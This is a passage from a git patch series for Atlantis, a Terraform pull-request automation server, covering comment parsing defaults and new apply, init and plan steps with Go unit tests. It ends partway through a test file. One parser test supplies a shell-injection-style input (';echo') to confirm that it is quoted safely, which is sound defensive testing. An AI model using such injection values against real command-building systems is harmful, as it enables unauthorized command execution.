From 8ee16a0281b0180c1ca9986a67a99d9c3cb98bd8 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 21 Mar 2018 17:12:17 -0700 Subject: [PATCH 01/69] By default atlantis plan will run in root dir. This change makes things cleaner because there will only ever be one plan generated in the comment flow. It's okay to make this change because typing the plan command a couple times isn't too bad AND we're going to be implementing autoplanning which should handle most of the times you needed to type plan from before. --- server/events/comment_parser.go | 13 ++++---- server/events/comment_parser_test.go | 25 ++++++--------- server/events/event_parser.go | 33 +++++++++++++++---- server/events/event_parser_test.go | 48 ++++++++++++++++++++++++++++ 4 files changed, 91 insertions(+), 28 deletions(-) diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go index d0e921d79e..2c9e1b0c1b 100644 --- a/server/events/comment_parser.go +++ b/server/events/comment_parser.go @@ -31,6 +31,8 @@ const ( DirFlagShort = "d" VerboseFlagLong = "verbose" VerboseFlagShort = "" + DefaultWorkspace = "default" + DefaultDir = "." ) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_comment_parsing.go CommentParsing @@ -135,21 +137,20 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen var name CommandName // Set up the flag parsing depending on the command. - const defaultWorkspace = "default" switch command { case Plan.String(): name = Plan flagSet = pflag.NewFlagSet(Plan.String(), pflag.ContinueOnError) flagSet.SetOutput(ioutil.Discard) - flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, defaultWorkspace, "Switch to this Terraform workspace before planning.") - flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, "", "Which directory to run plan in relative to root of repo. Use '.' for root. 
If not specified, will attempt to run plan for all Terraform projects we think were modified in this changeset.") + flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Switch to this Terraform workspace before planning.") + flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Which directory to run plan in relative to root of repo, ex. 'child/dir'.") flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.") case Apply.String(): name = Apply flagSet = pflag.NewFlagSet(Apply.String(), pflag.ContinueOnError) flagSet.SetOutput(ioutil.Discard) - flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, defaultWorkspace, "Apply the plan for this Terraform workspace.") - flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, "", "Apply the plan for this directory, relative to root of repo. Use '.' for root. If not specified, will run apply against all plans created for this workspace.") + flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Apply the plan for this Terraform workspace.") + flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Apply the plan for this directory, relative to root of repo, ex. 
'child/dir'.") flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.") default: return CommentParseResult{CommentResponse: fmt.Sprintf("Error: unknown command %q – this is a bug", command)} @@ -198,7 +199,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen } return CommentParseResult{ - Command: &Command{Name: name, Verbose: verbose, Workspace: workspace, Dir: dir, Flags: extraArgs}, + Command: NewCommand(dir, extraArgs, name, verbose, workspace), } } diff --git a/server/events/comment_parser_test.go b/server/events/comment_parser_test.go index 87b14f358b..81fe4da9f8 100644 --- a/server/events/comment_parser_test.go +++ b/server/events/comment_parser_test.go @@ -31,8 +31,6 @@ var commentParser = events.CommentParser{ } func TestParse_Ignored(t *testing.T) { - t.Log("given a comment that should be ignored we should set " + - "CommentParseResult.Ignore to true") ignoreComments := []string{ "", "a", @@ -47,8 +45,6 @@ func TestParse_Ignored(t *testing.T) { } func TestParse_HelpResponse(t *testing.T) { - t.Log("given a comment that should result in help output we " + - "should set CommentParseResult.CommentResult") helpComments := []string{ "run", "atlantis", @@ -271,7 +267,7 @@ func TestParse_Parsing(t *testing.T) { { "", "default", - "", + ".", false, "", }, @@ -279,7 +275,7 @@ func TestParse_Parsing(t *testing.T) { { "-w workspace", "workspace", - "", + ".", false, "", }, @@ -293,7 +289,7 @@ func TestParse_Parsing(t *testing.T) { { "--verbose", "default", - "", + ".", true, "", }, @@ -330,7 +326,7 @@ func TestParse_Parsing(t *testing.T) { { "-w workspace -- -d dir --verbose", "workspace", - "", + ".", false, "\"-d\" \"dir\" \"--verbose\"", }, @@ -338,7 +334,7 @@ func TestParse_Parsing(t *testing.T) { { "--", "default", - "", + ".", false, "", }, @@ -346,7 +342,7 @@ func TestParse_Parsing(t *testing.T) { { "-- \";echo \"hi", "default", - "", + ".", false, `"\";echo" "\"hi"`, }, @@ 
-430,10 +426,8 @@ func TestParse_Parsing(t *testing.T) { } var PlanUsage = `Usage of plan: - -d, --dir string Which directory to run plan in relative to root of repo. - Use '.' for root. If not specified, will attempt to run - plan for all Terraform projects we think were modified in - this changeset. + -d, --dir string Which directory to run plan in relative to root of repo, + ex. 'child/dir'. (default ".") --verbose Append Atlantis log to comment. -w, --workspace string Switch to this Terraform workspace before planning. (default "default") @@ -441,8 +435,7 @@ var PlanUsage = `Usage of plan: var ApplyUsage = `Usage of apply: -d, --dir string Apply the plan for this directory, relative to root of - repo. Use '.' for root. If not specified, will run apply - against all plans created for this workspace. + repo, ex. 'child/dir'. (default ".") --verbose Append Atlantis log to comment. -w, --workspace string Apply the plan for this Terraform workspace. (default "default") diff --git a/server/events/event_parser.go b/server/events/event_parser.go index d42e4beda0..cd3e36f5b3 100644 --- a/server/events/event_parser.go +++ b/server/events/event_parser.go @@ -14,6 +14,7 @@ package events import ( + "path" "regexp" "github.com/google/go-github/github" @@ -32,14 +33,34 @@ var multiLineRegex = regexp.MustCompile(`.*\r?\n.+`) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_event_parsing.go EventParsing type Command struct { - Name CommandName - Workspace string - Verbose bool - Flags []string // Dir is the path relative to the repo root to run the command in. - // If empty string then it wasn't specified. "." is the root of the repo. - // Dir will never end in "/". + // Will never be an empty string and will never end in "/". Dir string + // Flags are the extra arguments appended to comment, + // ex. 
atlantis plan -- -target=resource + Flags []string + Name CommandName + Verbose bool + Workspace string +} + +// NewCommand constructs a Command, setting all missing fields to defaults. +func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string) *Command { + // If dir was an empty string, this will return '.'. + validDir := path.Clean(dir) + if validDir == "/" { + validDir = "." + } + if workspace == "" { + workspace = DefaultWorkspace + } + return &Command{ + Dir: validDir, + Flags: flags, + Name: name, + Verbose: verbose, + Workspace: workspace, + } } type EventParsing interface { diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go index 9928dc69c9..dbd4b515e4 100644 --- a/server/events/event_parser_test.go +++ b/server/events/event_parser_test.go @@ -257,6 +257,54 @@ func TestParseGitlabMergeCommentEvent(t *testing.T) { }, user) } +func TestNewCommand_CleansDir(t *testing.T) { + cases := []struct { + Dir string + ExpDir string + }{ + { + "", + ".", + }, + { + "/", + ".", + }, + { + "./", + ".", + }, + // We rely on our callers to not pass in relative dirs. 
+ { + "..", + "..", + }, + } + + for _, c := range cases { + t.Run(c.Dir, func(t *testing.T) { + cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace") + Equals(t, c.ExpDir, cmd.Dir) + }) + } +} + +func TestNewCommand_EmptyWorkspace(t *testing.T) { + cmd := events.NewCommand("dir", nil, events.Plan, false, "") + Equals(t, "default", cmd.Workspace) +} + +func TestNewCommand_AllFieldsSet(t *testing.T) { + cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace") + Equals(t, events.Command{ + Workspace: "workspace", + Dir: "dir", + Verbose: true, + Flags: []string{"a", "b"}, + Name: events.Plan, + }, *cmd) +} + var mergeEventJSON = `{ "object_kind": "merge_request", "user": { From 6dc0e3c3f355bb5565b1d2eed658aa92fc9cd8a4 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 22 Mar 2018 11:56:33 -0700 Subject: [PATCH 02/69] Implement apply step. --- server/events/atlantisyaml/apply_step.go | 28 ++++++ server/events/atlantisyaml/apply_step_test.go | 89 +++++++++++++++++++ 2 files changed, 117 insertions(+) create mode 100644 server/events/atlantisyaml/apply_step.go create mode 100644 server/events/atlantisyaml/apply_step_test.go diff --git a/server/events/atlantisyaml/apply_step.go b/server/events/atlantisyaml/apply_step.go new file mode 100644 index 0000000000..c75d4ae3c2 --- /dev/null +++ b/server/events/atlantisyaml/apply_step.go @@ -0,0 +1,28 @@ +package atlantisyaml + +import ( + "fmt" + "os" + "path/filepath" + + "github.com/runatlantis/atlantis/server/events/vcs" +) + +// ApplyStep runs `terraform apply`. 
+type ApplyStep struct { + ExtraArgs []string + VCSClient vcs.ClientProxy + TerraformExecutor TerraformExec + Meta StepMeta +} + +func (a *ApplyStep) Run() (string, error) { + planPath := filepath.Join(a.Meta.AbsolutePath, a.Meta.Workspace+".tfplan") + stat, err := os.Stat(planPath) + if err != nil || stat.IsDir() { + return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", a.Meta.DirRelativeToRepoRoot, a.Meta.Workspace) + } + + tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, a.ExtraArgs...), a.Meta.ExtraCommentArgs...), planPath) + return a.TerraformExecutor.RunCommandWithVersion(a.Meta.Log, a.Meta.AbsolutePath, tfApplyCmd, a.Meta.TerraformVersion, a.Meta.Workspace) +} diff --git a/server/events/atlantisyaml/apply_step_test.go b/server/events/atlantisyaml/apply_step_test.go new file mode 100644 index 0000000000..081774ace1 --- /dev/null +++ b/server/events/atlantisyaml/apply_step_test.go @@ -0,0 +1,89 @@ +package atlantisyaml_test + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/hashicorp/go-version" + . "github.com/petergtz/pegomock" + "github.com/runatlantis/atlantis/server/events/atlantisyaml" + "github.com/runatlantis/atlantis/server/events/mocks/matchers" + matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/terraform/mocks" + . 
"github.com/runatlantis/atlantis/testing" +) + +func TestRun_NoDir(t *testing.T) { + s := atlantisyaml.ApplyStep{ + Meta: atlantisyaml.StepMeta{ + Workspace: "workspace", + AbsolutePath: "nonexistent/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: nil, + ExtraCommentArgs: nil, + Username: "username", + }, + } + _, err := s.Run() + ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err) +} + +func TestRun_NoPlanFile(t *testing.T) { + tmpDir, cleanup := applyTestTmpDir(t) + defer cleanup() + + s := atlantisyaml.ApplyStep{ + Meta: atlantisyaml.StepMeta{ + Workspace: "workspace", + AbsolutePath: tmpDir, + DirRelativeToRepoRoot: ".", + TerraformVersion: nil, + ExtraCommentArgs: nil, + Username: "username", + }, + } + _, err := s.Run() + ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err) +} + +func TestRun_Success(t *testing.T) { + tmpDir, cleanup := applyTestTmpDir(t) + defer cleanup() + planPath := filepath.Join(tmpDir, "workspace.tfplan") + err := ioutil.WriteFile(planPath, nil, 0644) + Ok(t, err) + + RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + + tfVersion, _ := version.NewVersion("0.11.4") + s := atlantisyaml.ApplyStep{ + Meta: atlantisyaml.StepMeta{ + Workspace: "workspace", + AbsolutePath: tmpDir, + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). 
+ ThenReturn("output", nil) + output, err := s.Run() + Ok(t, err) + Equals(t, "output", output) + terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace") +} + +// applyTestTmpDir creates a temporary directory and returns its path along +// with a cleanup function to be called via defer. +func applyTestTmpDir(t *testing.T) (string, func()) { + tmpDir, err := ioutil.TempDir("", "") + Ok(t, err) + return tmpDir, func() { os.RemoveAll(tmpDir) } +} From 692e4144ed7c9daf9cc6557f57ebf515a6bc9b73 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 22 Mar 2018 12:09:08 -0700 Subject: [PATCH 03/69] Implement init step. --- server/events/atlantisyaml/init_step.go | 32 +++++++++ server/events/atlantisyaml/init_step_test.go | 70 ++++++++++++++++++++ 2 files changed, 102 insertions(+) create mode 100644 server/events/atlantisyaml/init_step.go create mode 100644 server/events/atlantisyaml/init_step_test.go diff --git a/server/events/atlantisyaml/init_step.go b/server/events/atlantisyaml/init_step.go new file mode 100644 index 0000000000..a25cb94fe4 --- /dev/null +++ b/server/events/atlantisyaml/init_step.go @@ -0,0 +1,32 @@ +package atlantisyaml + +import "github.com/hashicorp/go-version" + +// InitStep runs `terraform init`. +type InitStep struct { + ExtraArgs []string + TerraformExecutor TerraformExec + Meta StepMeta +} + +func (i *InitStep) Run() (string, error) { + // If we're running < 0.9 we have to use `terraform get` instead of `init`. + if MustConstraint("< 0.9.0").Check(i.Meta.TerraformVersion) { + i.Meta.Log.Info("running terraform version %s so will use `get` instead of `init`", i.Meta.TerraformVersion) + terraformGetCmd := append([]string{"get", "-no-color"}, i.ExtraArgs...) 
+ _, err := i.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, terraformGetCmd, i.Meta.TerraformVersion, i.Meta.Workspace) + return "", err + } else { + _, err := i.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, append([]string{"init", "-no-color"}, i.ExtraArgs...), i.Meta.TerraformVersion, i.Meta.Workspace) + return "", err + } +} + +// MustConstraint returns a constraint. It panics on error. +func MustConstraint(constraint string) version.Constraints { + c, err := version.NewConstraint(constraint) + if err != nil { + panic(err) + } + return c +} diff --git a/server/events/atlantisyaml/init_step_test.go b/server/events/atlantisyaml/init_step_test.go new file mode 100644 index 0000000000..8704f832df --- /dev/null +++ b/server/events/atlantisyaml/init_step_test.go @@ -0,0 +1,70 @@ +package atlantisyaml_test + +import ( + "testing" + + "github.com/hashicorp/go-version" + . "github.com/petergtz/pegomock" + "github.com/runatlantis/atlantis/server/events/atlantisyaml" + "github.com/runatlantis/atlantis/server/events/mocks/matchers" + matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/terraform/mocks" + "github.com/runatlantis/atlantis/server/logging" + . 
"github.com/runatlantis/atlantis/testing" +) + +func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { + RegisterMockTestingT(t) + cases := []struct { + version string + expCmd string + }{ + { + "0.8.9", + "get", + }, + { + "0.9.0", + "init", + }, + { + "0.9.1", + "init", + }, + { + "0.10.0", + "init", + }, + } + + for _, c := range cases { + t.Run(c.version, func(t *testing.T) { + terraform := mocks.NewMockClient() + + tfVersion, _ := version.NewVersion(c.version) + logger := logging.NewNoopLogger() + s := atlantisyaml.InitStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: "workspace", + AbsolutePath: "/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). + ThenReturn("output", nil) + output, err := s.Run() + Ok(t, err) + // Shouldn't return output since we don't print init output to PR. + Equals(t, "", output) + + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{c.expCmd, "-no-color", "extra", "args"}, tfVersion, "workspace") + }) + } +} From 464cd51eaeb65466bfbb2da7b457fd49bb0a55a4 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 22 Mar 2018 13:36:56 -0700 Subject: [PATCH 04/69] Implement plan step. 
--- server/events/atlantisyaml/apply_step_test.go | 8 +- server/events/atlantisyaml/plan_step.go | 94 ++++++ server/events/atlantisyaml/plan_step_test.go | 285 ++++++++++++++++++ 3 files changed, 383 insertions(+), 4 deletions(-) create mode 100644 server/events/atlantisyaml/plan_step.go create mode 100644 server/events/atlantisyaml/plan_step_test.go diff --git a/server/events/atlantisyaml/apply_step_test.go b/server/events/atlantisyaml/apply_step_test.go index 081774ace1..0502ab2e1f 100644 --- a/server/events/atlantisyaml/apply_step_test.go +++ b/server/events/atlantisyaml/apply_step_test.go @@ -31,7 +31,7 @@ func TestRun_NoDir(t *testing.T) { } func TestRun_NoPlanFile(t *testing.T) { - tmpDir, cleanup := applyTestTmpDir(t) + tmpDir, cleanup := tmpDir_stepTests(t) defer cleanup() s := atlantisyaml.ApplyStep{ @@ -49,7 +49,7 @@ func TestRun_NoPlanFile(t *testing.T) { } func TestRun_Success(t *testing.T) { - tmpDir, cleanup := applyTestTmpDir(t) + tmpDir, cleanup := tmpDir_stepTests(t) defer cleanup() planPath := filepath.Join(tmpDir, "workspace.tfplan") err := ioutil.WriteFile(planPath, nil, 0644) @@ -80,9 +80,9 @@ func TestRun_Success(t *testing.T) { terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace") } -// applyTestTmpDir creates a temporary directory and returns its path along +// tmpDir_stepTests creates a temporary directory and returns its path along // with a cleanup function to be called via defer. 
-func applyTestTmpDir(t *testing.T) (string, func()) { +func tmpDir_stepTests(t *testing.T) (string, func()) { tmpDir, err := ioutil.TempDir("", "") Ok(t, err) return tmpDir, func() { os.RemoveAll(tmpDir) } diff --git a/server/events/atlantisyaml/plan_step.go b/server/events/atlantisyaml/plan_step.go new file mode 100644 index 0000000000..646506381b --- /dev/null +++ b/server/events/atlantisyaml/plan_step.go @@ -0,0 +1,94 @@ +package atlantisyaml + +import ( + "fmt" + "os" + "path/filepath" + "strings" +) + +// atlantisUserTFVar is the name of the variable we execute terraform +// with, containing the vcs username of who is running the command +const atlantisUserTFVar = "atlantis_user" +const defaultWorkspace = "default" + +// PlanStep runs `terraform plan`. +type PlanStep struct { + ExtraArgs []string + TerraformExecutor TerraformExec + Meta StepMeta +} + +func (p *PlanStep) Run() (string, error) { + // We only need to switch workspaces in version 0.9.*. In older versions, + // there is no such thing as a workspace so we don't need to do anything. + // In newer versions, the TF_WORKSPACE env var is respected and will handle + // using the right workspace and even creating it if it doesn't exist. + // This variable is set inside the Terraform executor. + if err := p.switchWorkspace(); err != nil { + return "", err + } + + planFile := filepath.Join(p.Meta.AbsolutePath, fmt.Sprintf("%s.tfplan", p.Meta.Workspace)) + userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, p.Meta.Username) + tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, p.ExtraArgs...), p.Meta.ExtraCommentArgs...) + + // Check if env/{workspace}.tfvars exist and include it. This is a use-case + // from Hootsuite where Atlantis was first created so we're keeping this as + // an homage and a favor so they don't need to refactor all their repos. + // It's also a nice way to structure your repos to reduce duplication. 
+ optionalEnvFile := filepath.Join(p.Meta.AbsolutePath, "env", p.Meta.Workspace+".tfvars") + if _, err := os.Stat(optionalEnvFile); err == nil { + tfPlanCmd = append(tfPlanCmd, "-var-file", optionalEnvFile) + } + + return p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, filepath.Join(p.Meta.AbsolutePath), tfPlanCmd, p.Meta.TerraformVersion, p.Meta.Workspace) +} + +// switchWorkspace changes the terraform workspace if necessary and will create +// it if it doesn't exist. It handles differences between versions. +func (p *PlanStep) switchWorkspace() error { + // In versions less than 0.9 there is no support for workspaces. + noWorkspaceSupport := MustConstraint("<0.9").Check(p.Meta.TerraformVersion) + if noWorkspaceSupport && p.Meta.Workspace != defaultWorkspace { + return fmt.Errorf("terraform version %s does not support workspaces", p.Meta.TerraformVersion) + } + if noWorkspaceSupport { + return nil + } + + // In version 0.9.* the workspace command was called env. + workspaceCmd := "workspace" + runningZeroPointNine := MustConstraint(">=0.9,<0.10").Check(p.Meta.TerraformVersion) + if runningZeroPointNine { + workspaceCmd = "env" + } + + // Use `workspace show` to find out what workspace we're in now. If we're + // already in the right workspace then no need to switch. This will save us + // about ten seconds. This command is only available in > 0.10. + if !runningZeroPointNine { + workspaceShowOutput, err := p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "show"}, p.Meta.TerraformVersion, p.Meta.Workspace) + if err != nil { + return err + } + // If `show` says we're already on this workspace then we're done. + if strings.TrimSpace(workspaceShowOutput) == p.Meta.Workspace { + return nil + } + } + + // Finally we'll have to select the workspace. Although we end up running + // with TF_WORKSPACE set, we need to figure out if this workspace exists so + // we can create it if it doesn't. 
To do this we can either select and catch + // the error or use list and then look for the workspace. Both commands take + // the same amount of time so that's why we're running select here. + _, err := p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "select", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) + if err != nil { + // If terraform workspace select fails we run terraform workspace + // new to create a new workspace automatically. + _, err = p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "new", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) + return err + } + return nil +} diff --git a/server/events/atlantisyaml/plan_step_test.go b/server/events/atlantisyaml/plan_step_test.go new file mode 100644 index 0000000000..d5d7502992 --- /dev/null +++ b/server/events/atlantisyaml/plan_step_test.go @@ -0,0 +1,285 @@ +package atlantisyaml_test + +import ( + "errors" + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/hashicorp/go-version" + . "github.com/petergtz/pegomock" + "github.com/runatlantis/atlantis/server/events/atlantisyaml" + "github.com/runatlantis/atlantis/server/events/mocks/matchers" + matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/terraform/mocks" + "github.com/runatlantis/atlantis/server/logging" + . "github.com/runatlantis/atlantis/testing" +) + +func TestRun_NoWorkspaceIn08(t *testing.T) { + // We don't want any workspace commands to be run in 0.8. 
+ RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + + tfVersion, _ := version.NewVersion("0.8") + logger := logging.NewNoopLogger() + workspace := "default" + s := atlantisyaml.PlanStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: workspace, + AbsolutePath: "/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). + ThenReturn("output", nil) + output, err := s.Run() + Ok(t, err) + + Equals(t, "output", output) + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{"plan", "-refresh", "-no-color", "-out", "/path/default.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}, tfVersion, workspace) + + // Verify that no env or workspace commands were run + terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"env", "select", "-no-color", "workspace"}, tfVersion, workspace) + terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"workspace", "select", "-no-color", "workspace"}, tfVersion, workspace) +} + +func TestRun_ErrWorkspaceIn08(t *testing.T) { + // If they attempt to use a workspace other than default in 0.8 + // we should error. 
+ RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + + tfVersion, _ := version.NewVersion("0.8") + logger := logging.NewNoopLogger() + workspace := "notdefault" + s := atlantisyaml.PlanStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: workspace, + AbsolutePath: "/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). + ThenReturn("output", nil) + _, err := s.Run() + ErrEquals(t, "terraform version 0.8.0 does not support workspaces", err) +} + +func TestRun_SwitchesWorkspace(t *testing.T) { + RegisterMockTestingT(t) + + cases := []struct { + tfVersion string + expWorkspaceCmd string + }{ + { + "0.9.0", + "env", + }, + { + "0.9.11", + "env", + }, + { + "0.10.0", + "workspace", + }, + { + "0.11.0", + "workspace", + }, + } + + for _, c := range cases { + t.Run(c.tfVersion, func(t *testing.T) { + terraform := mocks.NewMockClient() + + tfVersion, _ := version.NewVersion(c.tfVersion) + logger := logging.NewNoopLogger() + s := atlantisyaml.PlanStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: "workspace", + AbsolutePath: "/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). + ThenReturn("output", nil) + output, err := s.Run() + Ok(t, err) + + Equals(t, "output", output) + // Verify that env select was called as well as plan. 
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{c.expWorkspaceCmd, "select", "-no-color", "workspace"}, tfVersion, "workspace") + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}, tfVersion, "workspace") + }) + } +} + +func TestRun_CreatesWorkspace(t *testing.T) { + // Test that if `workspace select` fails, we call `workspace new`. + RegisterMockTestingT(t) + + cases := []struct { + tfVersion string + expWorkspaceCommand string + }{ + { + "0.9.0", + "env", + }, + { + "0.9.11", + "env", + }, + { + "0.10.0", + "workspace", + }, + { + "0.11.0", + "workspace", + }, + } + + for _, c := range cases { + t.Run(c.tfVersion, func(t *testing.T) { + terraform := mocks.NewMockClient() + tfVersion, _ := version.NewVersion(c.tfVersion) + logger := logging.NewNoopLogger() + s := atlantisyaml.PlanStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: "workspace", + AbsolutePath: "/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + // Ensure that we actually try to switch workspaces by making the + // output of `workspace show` to be a different name. 
+ When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("diffworkspace\n", nil) + + expWorkspaceArgs := []string{c.expWorkspaceCommand, "select", "-no-color", "workspace"} + When(terraform.RunCommandWithVersion(logger, "/path", expWorkspaceArgs, tfVersion, "workspace")).ThenReturn("", errors.New("workspace does not exist")) + + expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"} + When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil) + + output, err := s.Run() + Ok(t, err) + + Equals(t, "output", output) + // Verify that env select was called as well as plan. + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expWorkspaceArgs, tfVersion, "workspace") + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace") + }) + } +} + +func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) { + // Tests that if workspace show says we're on the right workspace we don't + // switch. 
+ RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + tfVersion, _ := version.NewVersion("0.10.0") + logger := logging.NewNoopLogger() + s := atlantisyaml.PlanStep{ + Meta: atlantisyaml.StepMeta{ + Log: logger, + Workspace: "workspace", + AbsolutePath: "/path", + DirRelativeToRepoRoot: ".", + TerraformVersion: tfVersion, + ExtraCommentArgs: []string{"comment", "args"}, + Username: "username", + }, + ExtraArgs: []string{"extra", "args"}, + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil) + + expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"} + When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil) + + output, err := s.Run() + Ok(t, err) + + Equals(t, "output", output) + terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace") + + // Verify that workspace select was never called. + terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"workspace", "select", "-no-color", "workspace"}, tfVersion, "workspace") +} + +func TestRun_AddsEnvVarFile(t *testing.T) { + // Test that if env/workspace.tfvars file exists we use -var-file option. + RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + + // Create the 